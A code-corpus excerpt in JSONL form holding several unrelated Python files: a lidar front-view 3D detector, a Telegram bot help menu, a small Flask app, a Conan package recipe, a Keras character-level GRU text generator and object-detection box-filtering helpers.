self.with_img_backbone and img is not None:\n            input_shape = img.shape[-2:]\n            # update real input shape of each single img\n            for img_meta in img_metas:\n                img_meta.update(input_shape=input_shape)\n\n            if img.dim() == 5 and img.size(0) == 1:\n                img.squeeze_()\n            elif img.dim() == 5 and img.size(0) > 1:\n                B, N, C, H, W = img.size()\n                img = img.view(B * N, C, H, W)\n            img_feats = self.img_backbone(img)\n        else:\n            return None\n        if self.with_img_neck:\n            img_feats = self.img_neck(img_feats)\n        return img_feats\n\n    def extract_fv_feat(self, fv, img_metas):\n        \"\"\"Extract features of points.\"\"\"\n        if self.with_fv_backbone and fv is not None:\n            x = self.fv_backbone(fv)\n        else:\n            return None\n        if self.with_fv_neck:\n            x = self.fv_neck(x)\n        return x\n\n    def extract_feat(self, fv, img, img_metas):\n        fv_feats = self.extract_fv_feat(fv, img_metas)\n        img_feats = self.extract_img_feat(img, img_metas)\n        return (fv_feats, img_feats)\n\n    def get_valid_coords(self, fv):\n        valid_coords = dict()\n        b, v, u = torch.nonzero(fv[:, -1, :, :], as_tuple=True)\n        valid_coords_2d = torch.stack([b, v, u]).T\n        valid_coords_3d = fv[b, :3, v, u]\n        valid_coords_3d = torch.cat([b.unsqueeze(dim=-1), valid_coords_3d], dim=1)\n        valid_coords['2d'] = valid_coords_2d\n        valid_coords['3d'] = valid_coords_3d\n\n        return valid_coords\n    \n    def pts_to_fv(self, points, img_metas):\n
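        # Shape notes (annotations inferred from the code below): `points` is a list of\n        # per-sample (N_i, 4) lidar tensors (x, y, z, reflectance), `lidar2img` stacks\n        # each sample's 4x4 projection into (B, 4, 4), and the output is one (5, H, W)\n        # front-view image per sample carrying x, y, z, reflectance and a validity flag\n        # at every projected pixel.\n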
        # TODO: decide how to handle flipping here\n        device = points[0].device\n        lidar2img = [torch.tensor(res['lidar2img'], device=device) for res\\\n            in img_metas]\n        lidar2img = torch.stack(lidar2img) # (B, 4, 4)\n        num_points = [pts.shape[0] for pts in points]\n        for i in range(len(points)):\n            pts = points[i]\n            if pts.shape[0] < max(num_points):\n                res = max(num_points) - pts.shape[0]\n                points[i] = torch.cat([pts, pts.new_zeros(res, pts.shape[1])], 0)\n        points = torch.stack(points) # (B, max(N), 4)\n\n        reflectances = points[..., -1]\n        points = points[..., :3] # (B, max(N), 3)\n        proj_velo2cam2 = lidar2img[:, :3, :]\n        pts_2d = self.project_to_image(points.permute(0, 2, 1), proj_velo2cam2)\n\n        fv_list = []\n        for i in range(points.shape[0]):\n            width, height = img_metas[i]['img_info']['img_shape']\n            inds = torch.where((pts_2d[i, 0, :] < width) & (pts_2d[i, 0, :] >= 0) &\n                               (pts_2d[i, 1, :] < height) & (pts_2d[i, 1, :] >= 0))[0]\n            imgfov_pc_pixel = pts_2d[i, :, inds]\n            imgfov_pc_velo = points[i, inds, :]\n            reflectance = reflectances[i, inds]\n\n            fv = points[0].new_zeros(height, width, 5)\n            x_coords = torch.trunc(imgfov_pc_pixel[0]).to(torch.long)\n            y_coords = torch.trunc(imgfov_pc_pixel[1]).to(torch.long)\n            fv[y_coords, x_coords, :3] = imgfov_pc_velo\n            fv[y_coords, x_coords, 3] = reflectance\n            flag_channel = (fv[:, :, 0] > 0)\n            fv[:, :, -1] = flag_channel\n            fv = fv.permute(2, 0, 1)\n            fv_list.append(fv)\n\n        return fv_list\n\n    def project_to_image(self, points, proj_mat):\n        # points (B, 3, max(N))\n        # proj_mat (B, 3, 4)\n        batch_size = points.shape[0]\n        num_pts = points.shape[2]\n\n        points = torch.cat([points, points.new_ones(batch_size, 1, num_pts)], 1)\n        points = torch.bmm(proj_mat, points) # (B, 3, 4) @ (B, 4, max(N))\n        # points (B, 3, max(N))\n        points[:, :2, :] /= points[:, 2, :].reshape(points.shape[0], 1, points.shape[2])\n        return points[:, :2, :] #(B, 2, max(N))\n\n
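    # A quick check of the projection math above: with proj_mat = K @ [R|t] of shape\n    # (3, 4) and a homogeneous point X = (x, y, z, 1), the pixel coordinates are\n    # u = (proj_mat @ X)[0] / (proj_mat @ X)[2] and v = (proj_mat @ X)[1] / (proj_mat @ X)[2];\n    # the in-place divide by points[:, 2, :] is exactly that perspective division.\n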
    def fusion(self, fv_feats, img_feats, fusion_mode):\n        if fusion_mode is None:\n            if fv_feats is not None:\n                return fv_feats\n            if img_feats is not None:\n                return img_feats\n\n    def resize_and_pad(self, fv_list, img_metas):\n        # Resize\n        new_fv_list = []\n        for i in range(len(fv_list)):\n            # Resize\n            fv = fv_list[i]\n            w_src, h_src = fv.shape[2], fv.shape[1]\n            w_des, h_des = self.projection_cfg['size']\n            w_scale, h_scale = (w_des / w_src, h_des / h_src)\n            if not (w_scale == 1. and h_scale == 1.):\n                fv_resized = torch.zeros((fv.shape[0], h_des, w_des),\n                                         dtype=fv.dtype,\n                                         device=fv.device)\n                _, src_v, src_u = torch.nonzero(fv, as_tuple=True)\n                src_idx = torch.stack([src_v, src_u]).unique(dim=1)\n                des_v = (src_idx[0] * h_scale).to(torch.long)\n                des_u = (src_idx[1] * w_scale).to(torch.long)\n                fv_resized[:, des_v, des_u] = fv[:, src_idx[0, :], src_idx[1, :]]\n                fv = fv_resized\n            # Padding\n            divisor = self.projection_cfg['divisor']\n            h_src, w_src = fv.shape[1], fv.shape[2]\n            h_des = math.ceil(fv.shape[1] / divisor) * divisor\n            w_des = math.ceil(fv.shape[2] / divisor) * divisor\n            h_pad = h_des - h_src\n            w_pad = w_des - w_src\n            if not (h_pad == 0 and w_pad == 0):\n                fv_padded = torch.zeros((fv.shape[0], h_des, w_des),\n                                        dtype=fv.dtype,\n                                        device=fv.device)\n                fv_padded[:, :h_src, :w_src] = fv\n                fv = fv_padded\n            new_fv_list.append(fv)\n        fv = torch.stack(new_fv_list)\n        return fv\n    \n    def filter_valid_feats(self, feats, valid_coords):\n        # feats: list [(B, 64, h, w)]\n        # valid_coords['2d']: torch.Tensor (N, 3)\n        # valid_coords['3d']: torch.Tensor (N, 4)\n        # keep only the N valid pixels out of the h*w feature map\n        # TODO: implement multi-scale support (compute valid coords first)\n\n        b = valid_coords['2d'][:, 0]\n        v = valid_coords['2d'][:, 1]\n        u = valid_coords['2d'][:, 2]\n        valid_feats = feats[0][b, :, v, u] # list [(N, 64)]\n\n        # concat xyz\n        xyz = valid_coords['3d'][:, 1:]\n        valid_feats = torch.cat([xyz, valid_feats], dim=1)\n\n        return [valid_feats]\n\n    def forward_train(self,\n                      points,\n                      img_metas,\n                      gt_bboxes_3d,\n                      gt_labels_3d,\n                      imgs=None,\n                      gt_bboxes_ignore=None):\n\n        fv = self.pts_to_fv(points, img_metas) # list B x (5, h, w)\n        fv = self.resize_and_pad(fv, img_metas) # (B, 5, h', w')\n\n        # flip\n        p = torch.rand(1)[0]\n        if p > 0.5:\n            fv = torch.flip(fv, dims=[3])\n            fv[:, 1, :, :] *= -1\n            for i in range(len(gt_bboxes_3d)):\n                gt_bboxes_3d[i].tensor[:, 1] *= -1\n        # scale\n        scale_factor = torch.rand(1).item() * 0.1 + 0.95\n        fv[:, :3, :, :] *= scale_factor\n        for i in range(len(gt_bboxes_3d)):\n            gt_bboxes_3d[i].tensor[:, :6] *= scale_factor\n\n        valid_coords = self.get_valid_coords(fv)\n        fv_feats, img_feats = self.extract_feat(fv, imgs, img_metas)\n        feats = self.fusion(fv_feats, img_feats, self.fusion_mode)\n        pts_feats = self.filter_valid_feats(feats, valid_coords)\n        outs = self.bbox_head(pts_feats)\n        losses = self.bbox_head.loss(*outs,\n                                     gt_bboxes_3d,\n                                     gt_labels_3d,\n                                     valid_coords)\n        return losses\n    \n    def simple_test(self,\n                    points,\n                    img_metas,\n                    imgs=None,\n                    gt_bboxes_3d=None,\n                    gt_labels_3d=None,\n                    rescale=False):\n        \"\"\"Test function without augmentation.\"\"\"\n        \"\"\"Implemented only for batch size of one.\"\"\"\n        points = [points]\n        img_metas = [img_metas]\n        fv = self.pts_to_fv(points, img_metas) # list B x (5, h, w)\n        fv = self.resize_and_pad(fv, img_metas) # (B, 5, h', w')\n        valid_coords = self.get_valid_coords(fv)\n        fv_feats, img_feats = self.extract_feat(fv, imgs, img_metas)\n        feats = self.fusion(fv_feats, img_feats, self.fusion_mode)\n        pts_feats = self.filter_valid_feats(feats, valid_coords)\n        outs = self.bbox_head(pts_feats)\n        bbox_list = self.bbox_head.get_bboxes(*outs,\n                                              img_metas,\n                                              valid_coords,\n                                              gt_bboxes_3d,\n                                              gt_labels_3d,\n                                              rescale=rescale)\n        bbox_results = [\n            bbox3d2result(bboxes, scores, labels)\n            for bboxes, scores, labels in bbox_list\n        ]\n\n        return bbox_results\n\n    def aug_test(self, points, img_metas, imgs=None, rescale=False):\n        \"\"\"Test function with augmentation.\"\"\"\n        feats = self.extract_feats(points, img_metas)\n\n        # only support aug_test for one sample\n        aug_bboxes = []\n        for x, img_meta 
in zip(feats, img_metas):\n outs = self.bbox_head(x)\n bbox_list = self.bbox_head.get_bboxes(\n *outs, img_meta, rescale=rescale)\n bbox_list = [\n dict(boxes_3d=bboxes, scores_3d=scores, labels_3d=labels)\n for bboxes, scores, labels in bbox_list\n ]\n aug_bboxes.append(bbox_list[0])\n\n # after merging, bboxes will be rescaled to the original image size\n merged_bboxes = merge_aug_bboxes_3d(aug_bboxes, img_metas,\n self.bbox_head.test_cfg)\n\n return [merged_bboxes]\n","sub_path":"mmdet3d/models/detectors/fvnet.py","file_name":"fvnet.py","file_ext":"py","file_size_in_byte":12164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23086388","text":"from Evie import CMD_LIST, CMD_HELP, xbot\nimport io\nimport re\nfrom math import ceil\n\nfrom telethon import custom, events, Button\n\nfrom Evie.events import register\n\nfrom telethon import types\nfrom telethon.tl import functions\n\nfrom pymongo import MongoClient\nfrom Evie import MONGO_DB_URI\n\nclient = MongoClient()\nclient = MongoClient(MONGO_DB_URI)\ndb = client[\"evie\"]\npagenumber = db.pagenumber\n\n\n\nabout = \"**About Me**\\n\\nMy name is Evie, A group management bot who can take care of your groups with automated regular admin actions!\\n\\n**My Software Version:** 2.0.1\\n**Telethon Version:** 1.21.1\\n\\n**My Developers:**\\n• @RoseLoverX\\n• @LegendX22\\n• @Proboyx\\n\\nUpdates Channel: [Click Here](t.me/lunabotnews)\\nSupport Chat: [Click Here](t.me/lunabotsupport)\\n\\nAnd finally thanks for Supporting me😘\"\nad_caption = \"Hey! I am Evie, here to help you manage your groups! I perform most of the admin functions and make your group automated!\\n\\nJoin @Lunabotnews for updates.\\n@Lunabotsupport for help and support\\n\\nYou can checkout more about me via following buttons.\"\npm_caption = \"Hey there! My name is Evie - I'm a Telethon based Bot Made to help you manage your groups!\\n\\nHit /help to find out more about me and unleash my full potential.\\n\\n\"\npmt = \"Hello there! I'm Evie\\nI'm a Telethon Based group management bot\\n with a Much More! 
Have a look\\nat the following for an idea of some of \\nthe things I can help you with.\\n\\nMain commands available:\\n/start : Starts me, can be used to check i'm alive or not.\\n/help : PM's you this message.\\nExplore My Commands🙃.\"\n@register(pattern=\"^/start$\")\nasync def start(event):\n\n if not event.is_group:\n await xbot.send_message(\n event.chat_id,\n pm_caption,\n buttons=[\n [\n Button.inline(\"Advanced\", data=\"soon\"),\n Button.inline(\"Commands\", data=\"help_menu\"),\n ],\n [\n Button.url(\n \"Add Me To Your Group!\", \"t.me/missevie_robot?startgroup=true\"\n ),\n ],\n ],\n )\n else:\n await event.reply(\"Heya Luna Here!,\\nHow Can I Help Ya.\")\n\n@xbot.on(events.CallbackQuery(pattern=r\"reopen_again\"))\nasync def reopen_again(event):\n if not event.is_group:\n await event.edit(\n pm_caption,\n buttons=[\n [\n Button.inline(\"Advanced\", data=\"soon\"),\n Button.inline(\"Commands\", data=\"help_menu\"),\n ],\n [\n Button.url(\n \"Add Me To Your Group!\", \"t.me/missevie_robot?startgroup=true\"\n ),\n ],\n ],\n )\n else:\n pass\n\n\n@register(pattern=\"^/help$\")\nasync def help(event):\n if not event.is_group:\n buttons = paginate_help(event, 0, CMD_LIST, \"helpme\")\n await event.reply(pmt, buttons=buttons)\n else:\n await event.reply(\n \"Contact me in PM for help!\",\n buttons=[[Button.url(\"Click me for help!\", \"t.me/missevie_robot?start=help\")]],\n )\n\n@xbot.on(events.CallbackQuery(pattern=r\"help_menu\"))\nasync def help_menu(event):\n buttons = paginate_help(event, 0, CMD_LIST, \"helpme\")\n await event.edit(pmt, buttons=buttons)\n\n@xbot.on(events.CallbackQuery(pattern=r\"soon\"))\nasync def soon(event):\n buttons=[[Button.inline(\"About Me\", data=\"about_me\"), Button.inline(\"Commands\", data=\"help_menu\"),],[Button.inline(\"Go Back\", data=\"reopen_again\"),],]\n await event.edit(ad_caption, buttons=buttons)\n\n@xbot.on(events.CallbackQuery(pattern=r\"about_me\"))\nasync def soon(event):\n buttons=[Button.inline(\"Go Back\", data=\"soon\"),]\n await event.edit(about, buttons=buttons)\n\n@xbot.on(events.callbackquery.CallbackQuery(data=re.compile(b\"us_plugin_(.*)\")))\nasync def on_plug_in_callback_query_handler(event):\n plugin_name = event.data_match.group(1).decode(\"UTF-8\")\n help_string = \"\"\n # By @RoseLoverX\n\n for i in CMD_LIST[plugin_name]:\n plugin = plugin_name.replace(\"_\", \" \")\n emoji = plugin_name.split(\"_\")[0]\n output = str(CMD_HELP[plugin][1])\n help_string = f\"Here is the help for **{emoji}**:\\n\" + output\n\n if help_string is None:\n pass # stuck on click\n else:\n reply_pop_up_alert = help_string\n try:\n await event.edit(\n reply_pop_up_alert, buttons=[\n [Button.inline(\"Back\", data=\"go_back\")]]\n )\n except BaseException:\n pass\n\n@xbot.on(events.CallbackQuery(pattern=r\"go_back\"))\nasync def go_back(event):\n c = pagenumber.find_one({\"id\": event.sender_id})\n number = c[\"page\"]\n # print (number)\n buttons = paginate_help(event, number, CMD_LIST, \"helpme\")\n await event.edit(pm_caption, buttons=buttons)\n\ndef get_page(id):\n return pagenumber.find_one({\"id\": id})\n\n\ndef paginate_help(event, page_number, loaded_plugins, prefix):\n number_of_rows = 15\n number_of_cols = 3\n\n to_check = get_page(id=event.sender_id)\n\n if not to_check:\n pagenumber.insert_one({\"id\": event.sender_id, \"page\": page_number})\n\n else:\n pagenumber.update_one(\n {\n \"_id\": to_check[\"_id\"],\n \"id\": to_check[\"id\"],\n \"page\": to_check[\"page\"],\n },\n {\"$set\": {\"page\": page_number}},\n )\n\n 
helpable_plugins = []\n for p in loaded_plugins:\n if not p.startswith(\"_\"):\n helpable_plugins.append(p)\n helpable_plugins = sorted(helpable_plugins)\n modules = [\n custom.Button.inline(\n \"{}\".format(x.replace(\"_\", \" \")), data=\"us_plugin_{}\".format(x)\n )\n for x in helpable_plugins\n ]\n pairs = list(zip(modules[::number_of_cols], modules[1::number_of_cols], modules[2::number_of_cols]))\n if len(modules) % number_of_cols == 1:\n pairs.append((modules[-1],))\n max_num_pages = ceil(len(pairs) / number_of_rows)\n modulo_page = page_number % max_num_pages\n pairs = pairs[\n modulo_page * number_of_rows: number_of_rows * (modulo_page + 1)\n ] + [\n (\n custom.Button.inline(\n \"Go Back\", data=\"reopen_again\"\n ),\n custom.Button.inline(\n \"Advanced Commands\", data=\"fun_help\"\n ),\n )\n ]\n return pairs\n\ndef nood_page(event, page_number, loaded_plugins, prefix):\n number_of_rows = 15\n number_of_cols = 3\n\n to_check = get_page(id=event.sender_id)\n\n if not to_check:\n pagenumber.insert_one({\"id\": event.sender_id, \"page\": page_number})\n\n else:\n pagenumber.update_one(\n {\n \"_id\": to_check[\"_id\"],\n \"id\": to_check[\"id\"],\n \"page\": to_check[\"page\"],\n },\n {\"$set\": {\"page\": page_number}},\n )\n\n helpable_plugins = []\n for p in loaded_plugins:\n if not p.startswith(\"_\"):\n helpable_plugins.append(p)\n helpable_plugins = sorted(helpable_plugins)\n modules = [\n custom.Button.inline(\n \"{}\".format(x.replace(\"_\", \" \")), data=\"help_plugin_{}\".format(x)\n )\n for x in helpable_plugins\n ]\n pairs = list(zip(modules[::number_of_cols], modules[1::number_of_cols], modules[2::number_of_cols]))\n if len(modules) % number_of_cols == 1:\n pairs.append((modules[-1],))\n max_num_pages = ceil(len(pairs) / number_of_rows)\n modulo_page = page_number % max_num_pages\n pairs = pairs[\n modulo_page * number_of_rows: number_of_rows * (modulo_page + 1)\n ] + [\n (\n custom.Button.inline(\n \"Go Back\", data=\"help_menu\"\n ),\n )\n ]\n return pairs\n","sub_path":"Evie/modules/_menu.py","file_name":"_menu.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294549847","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route('/result')\ndef result():\n\tdict = {'math':95, 'physics':67, 'chem': 70}\n\treturn render_template('result.html', result = dict)\n\nif __name__ == '__main__':\n\tapp.run(port = 5005, debug = True)\n","sub_path":"app/temp_result.py","file_name":"temp_result.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"601533525","text":"import os\nfrom conans import ConanFile, CMake, tools\n\n\nclass TaoCPPPEGTLConan(ConanFile):\n name = \"taocpp-pegtl\"\n license = \"MIT\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/taocpp/pegtl\"\n description = \"Parsing Expression Grammar Template Library\"\n topics = (\"peg\", \"header-only\", \"cpp\", \"parsing\", \"cpp17\", \"cpp11\", \"grammar\")\n no_copy_source = True\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n extracted_dir = \"PEGTL-\" + self.version\n os.rename(extracted_dir, self._source_subfolder)\n\n def package(self):\n cmake = CMake(self)\n cmake.definitions[\"PEGTL_BUILD_TESTS\"] = False\n 
cmake.definitions[\"PEGTL_BUILD_EXAMPLES\"] = False\n        cmake.definitions[\"PEGTL_INSTALL_DOC_DIR\"] = \"licenses\"\n        cmake.configure(source_folder=self._source_subfolder)\n        cmake.install()\n        tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n    def package_id(self):\n        self.info.header_only()\n","sub_path":"recipes/taocpp-pegtl/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"199134692","text":"# coding: utf-8\nfrom __future__ import print_function\nfrom keras.layers.recurrent import GRU\nfrom tensorflow.python.lib.io.file_io import file_exists\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nimport numpy as np\nimport sys\nfrom time import sleep\nimport psutil\nfrom keras.layers.wrappers import TimeDistributed\n####\n# minesh.mathew@gmail.com\n# modified version of text generation example in keras; trained in a many-to-many fashion using a time distributed dense layer\n####\n'''\nw568w 1278297578@qq.com\nAdded code comments, changed the code to the Keras 2 API and replaced LSTM with GRU.\n'''\n\n\n\ndef sample(preds, temperature=1.0):\n    # helper function to sample an index from a probability array\n    preds = np.asarray(preds).astype('float64')\n    preds = np.log(preds) / temperature\n    exp_preds = np.exp(preds)\n    preds = exp_preds / np.sum(exp_preds)\n    probas = np.random.multinomial(1, preds, 1)\n    return np.argmax(probas)\n# testing\n# now you use the trained model to generate text; picking the argmax tends to\n# repeat itself, so sample() is used to draw the next character instead.\ndef test(seed_string, length):\n    print ('The generated text is')\n    sys.stdout.write(seed_string)\n    for i in range(length):\n        x = np.zeros((1, len(seed_string), len(chars)))\n        for t, char in enumerate(seed_string):\n            x[0, t, char_indices[char]] = 1.\n        preds = model.predict(x, verbose=0)[0]\n        #next_index = np.argmax(preds[len(seed_string) - 1])\n        next_index = sample(preds[len(seed_string) - 1])\n        next_char = indices_char[next_index]\n        seed_string = seed_string + next_char\n        \n        sys.stdout.write(next_char)\n\n\n# Read file\ntext = open('./textdatasets/tiny_input.txt').read().lower()\nprint('text length:', len(text))\n# deal with encoding problem when processing non-ascii chars.\ntext = unicode(text, 'utf-8')\n# collect the set of distinct characters, used as the character vocabulary\nchars = sorted(list(set(text)))\nprint('total chars:', len(chars))\n# build a dict from character to its index in chars\n# Eg. char_indices['c'] will return the index of 'c' in chars array\nchar_indices = dict((c, i) for i, c in enumerate(chars))\n# build the inverse dict from index to character\n# Eg. indices_char[0] will return the first element in chars array\nindices_char = dict((i, c) for i, c in enumerate(chars))\n\n# split the text into sequences of length=maxlen; next_chars holds the same\n# sequences shifted forward by one character.\n# E.g. for text ABCDE and maxlen=3:\n# sentences=[[A,B,C],[B,C,D]]\n# nextchars=[[B,C,D],[C,D,E]]\n\n# input is a sequence of maxlen chars and the target is the same sequence shifted by one position\n# Eg. if you maxlen=3 and the text is abcdefghi, your input ---> target pairs will be\n# [a,b,c] --> [b,c,d], [b,c,d]--->[c,d,e]....and so on\n
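# A quick REPL illustration of that pairing (illustrative only; note the loop below\n# also keeps one final pair whose target is one character short):\n# >>> text = 'abcde'; maxlen = 3\n# >>> [(text[i:i + maxlen], text[i + 1:i + 1 + maxlen]) for i in range(len(text) - maxlen)]\n# [('abc', 'bcd'), ('bcd', 'cde')]\n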
maxlen = 20\nsentences = []\nnext_chars = []\nfor i in range(0, len(text) - maxlen + 1, 1):\n    sentences.append(text[i: i + maxlen]) \n    next_chars.append(text[i + 1:i + 1 + maxlen]) \nprint('sequences length:', len(sentences))\n# Vectorize the data\nprint()\nprint('Vectorization...')\n# print the size of these two huge matrices and the available memory\nprint('array size:', float((len(sentences) * maxlen * len(chars))) * 2 / 1024 / 1024, 'MB')\ninfo = psutil.virtual_memory()\nprint('free memory:', float(info.available / (1024 ** 2)), 'MB')\n# Input is a 3-dim tensor, shape means (data_size, step_length, input_length_at_each_step)\n# X and y are one-hot vectors,\n# eg. X[0,0,0]=1 means the first char of the first sentence is chars[0]\nX = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)\ny = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool) \nfor i, sentence in enumerate(sentences):\n    for t, char in enumerate(sentence):\n        X[i, t, char_indices[char]] = 1\n\nfor i, sentence in enumerate(next_chars):\n    for t, char in enumerate(sentence):\n        y[i, t, char_indices[char]] = 1\n\nprint ('vectorization completed')\n# build the model: 1 stacked GRU+20% DropOut+Time Distributed Full-Connected Dense\nprint('Build model...')\nmodel = Sequential()\n# Specify the input shape; the sequence length is left as None so any length works\nmodel.add(GRU(512, input_shape=(None, len(chars)), return_sequences=True)) \n# model.add(LSTM(512, return_sequences=True)) \nmodel.add(Dropout(0.2))\n# TimeDistributed applies the same Dense layer at every time step (many-to-many),\n# wrapping the GRU's per-step outputs; Dense(len(chars)) makes the third output\n# dimension equal to the vocabulary size.\nmodel.add(TimeDistributed(Dense(len(chars))))\n# define the activation layer\nmodel.add(Activation('softmax'))\n# rmsprop suits RNNs well and is faster than other optimizers when training a RNN\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n\nprint (model.summary())\n# load saved weights (if they exist)\nif file_exists('Karpathy_LSTM_weights.h5'):\n    model.load_weights('Karpathy_LSTM_weights.h5')\n# Training\nfor iteration in range(1, 5):\n    print()\n    print('-' * 50)\n    print('Iteration', iteration)\n    # train the model, batch size=128, epochs=1\n    history = model.fit(X, y, batch_size=128, epochs=1)\n    # Must sleep on IPython, otherwise an I/O error is thrown when calling save_weights()\n    sleep(0.1)  # https://github.com/fchollet/keras/issues/2110\n    model.save_weights('Karpathy_LSTM_weights.h5', overwrite=True)\ntest(u\"我\",1000)\n","sub_path":"char_rnn_of_karpathy_keras.py","file_name":"char_rnn_of_karpathy_keras.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"555878805","text":"''' Views for various authentication schemes. '''\n\nfrom datetime import datetime\n\nfrom flask import abort, g, jsonify, request\nfrom flask.ext.classy import FlaskView, route\nfrom werkzeug.exceptions import BadRequest, Unauthorized\n\nfrom app.authorization import login_required\nfrom model import User\n\nclass UserView(FlaskView):\n    ''' Information about users. '''\n\n    @route('/whoami')\n    @login_required\n    def whoami(self):\n        ''' Return information about the current logged in user. 
'''\n\n        return jsonify(\n            id=g.user.id,\n            username=g.user.username,\n            image_url=g.user.image_url,\n            is_admin=g.user.is_admin\n        )\n\n    @route('/whoami', methods=('POST',))\n    @login_required\n    def change_username(self):\n        '''\n        Allow a user to change his/her own username.\n\n        A username can only be changed within 15 minutes after creating an\n        account. This is done so that users can select their own username\n        after creating an account but cannot freely change their username\n        after establishing a reputation on this site.\n        '''\n\n        CHANGE_TIME = 15\n\n        user_account_age = datetime.today() - g.user.added\n\n        if user_account_age.seconds > CHANGE_TIME * 60:\n            message = 'You are only allowed to change your username within' \\\n                      ' %d minutes of creating your account.' % CHANGE_TIME\n            raise Unauthorized(message)\n\n        request_json = request.get_json()\n        g.user.username = request_json['username']\n        g.db.commit()\n\n        return jsonify(message='Username changed successfully.')\n","sub_path":"lib/app/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260149001","text":"# Object detection project, library\r\nimport itertools\r\nimport numpy as np\r\nfrom copy import deepcopy\r\n\r\n\r\ndef data_structure_check(data_, photo_dim_, categories_):\r\n    \"\"\"\r\n    Parameters:\r\n        data_: the 4-dimensional list containing the raw data\r\n        photo_dim_: original photo dimensions\r\n        categories_: list of category names\r\n    Method:\r\n        check for consistency in the data structure\r\n    Return:\r\n        square size N\r\n    \"\"\"\r\n    # check for the correct format of the matrix\r\n    if np.ndim(np.array(data_, dtype=object)) != 4:\r\n        raise ValueError(\"Data structure does not have the correct format\")\r\n    (par_Bp, par_Ap, par_M, par_K) = np.shape(data_)\r\n    par_K -= 5\r\n\r\n    # check for consistency on the K parameter\r\n    if par_K != len(categories_):\r\n        raise ValueError(\"K parameter is inconsistent\")\r\n\r\n    # check for consistency on N\r\n    if photo_dim_[0] / photo_dim_[1] != par_Ap / par_Bp:\r\n        raise ValueError(\"Photo dimensions are inconsistent with data structure\")\r\n\r\n    return photo_dim_[0] / par_Ap\r\n\r\n\r\ndef create_dict(categories_):\r\n    cat_dict = {}\r\n    for ind, cat in enumerate(categories_):\r\n        cat_dict[ind + 1] = cat\r\n    return cat_dict\r\n\r\n\r\n# Step 1: function 1\r\ndef determine_class(data_):\r\n    \"\"\"\r\n    Parameters:\r\n        data_: the 4-dimensional list containing the raw data\r\n    Return:\r\n        A 3-dimensional list with the probability, for each NxN square, of containing an object of a specific category\r\n        (chosen as the one giving the highest probability)\r\n    \"\"\"\r\n    (par_Bp, par_Ap, par_M, par_K) = np.shape(data_)\r\n    for b, a in itertools.product(range(par_Bp), range(par_Ap)):\r\n        probability = 0\r\n        box = []\r\n        index = 0\r\n        for element in data_[b][a]:\r\n            for i, x in enumerate(element[5:]):\r\n                if (element[0] * x) > probability:\r\n                    probability = element[0] * x\r\n                    index = i\r\n                    box = element\r\n        if not box:\r\n            box = data_[b][a][0]\r\n            # if -for any reason- there is a square with only boxes of probability = 0, this allows the correct\r\n            # functioning of the code\r\n        data_[b][a] = [round(probability, 2)] + box[1:5] + [index + 1]\r\n    return data_\r\n\r\n\r\n# Step 1: function 2\r\ndef coordinates_conversion(data_, n_size_):\r\n    \"\"\"\r\n    Parameters:\r\n        data_: The 3-dimensional list containing information about one box per square and coordinates expressed\r\n            in format 
1\r\n        n_size_: Size of a single square N\r\n    Return:\r\n        A 3-dimensional list like the input parameter \"data_\" with coordinates converted in format 2\r\n    \"\"\"\r\n    (par_Bp, par_Ap, dummy) = np.shape(data_)\r\n    for b, a in itertools.product(range(par_Bp), range(par_Ap)):\r\n        data_[b][a] = [data_[b][a][0]] + \\\r\n                      [a * n_size_ + data_[b][a][1] - data_[b][a][3] / 2] + \\\r\n                      [b * n_size_ + data_[b][a][2] - data_[b][a][4] / 2] + \\\r\n                      [a * n_size_ + data_[b][a][1] + data_[b][a][3] / 2] + \\\r\n                      [b * n_size_ + data_[b][a][2] + data_[b][a][4] / 2] + \\\r\n                      [data_[b][a][-1]]\r\n    return data_\r\n\r\n\r\n# Step 2: function 3\r\ndef filtering(data_, thresh_=0.5):\r\n    \"\"\"\r\n    Parameters:\r\n        data_: The 3-dimensional list containing information about one box per square and coordinates expressed\r\n            in format 2\r\n        thresh_: Threshold parameter with default value of 0.5\r\n    Return:\r\n        A subset of input boxes in form of a 2-dimensional array containing only those with probability greater\r\n        than or equal to the threshold\r\n    \"\"\"\r\n    filtered_data = []\r\n    (par_Bp, par_Ap, par_K) = np.shape(data_)\r\n    for element in np.reshape(data_, (par_Bp*par_Ap, par_K)):\r\n        if element[0] >= thresh_:\r\n            filtered_data.append(element.tolist())\r\n    return filtered_data\r\n\r\n\r\n# Step 3: function 4\r\ndef iou_calculation(box1_, box2_):\r\n    \"\"\"\r\n    Parameters:\r\n        box1_: List of parameters describing a single box in format 2\r\n        box2_: List of parameters describing a single box in format 2\r\n    Return:\r\n        Intersection-over-union value of the two rectangles\r\n    \"\"\"\r\n    x_min = max(box1_[1], box2_[1])\r\n    y_min = max(box1_[2], box2_[2])\r\n    x_max = min(box1_[3], box2_[3])\r\n    y_max = min(box1_[4], box2_[4])\r\n    if (x_min > x_max) or (y_min > y_max):\r\n        return 0\r\n    else:\r\n        i_area = (x_max - x_min) * (y_max - y_min)\r\n        u_area = (box1_[3] - box1_[1]) * (box1_[4] - box1_[2]) + \\\r\n                 (box2_[3] - box2_[1]) * (box2_[4] - box2_[2]) + \\\r\n                 - i_area\r\n        return i_area / u_area\r\n\r\n\r\n
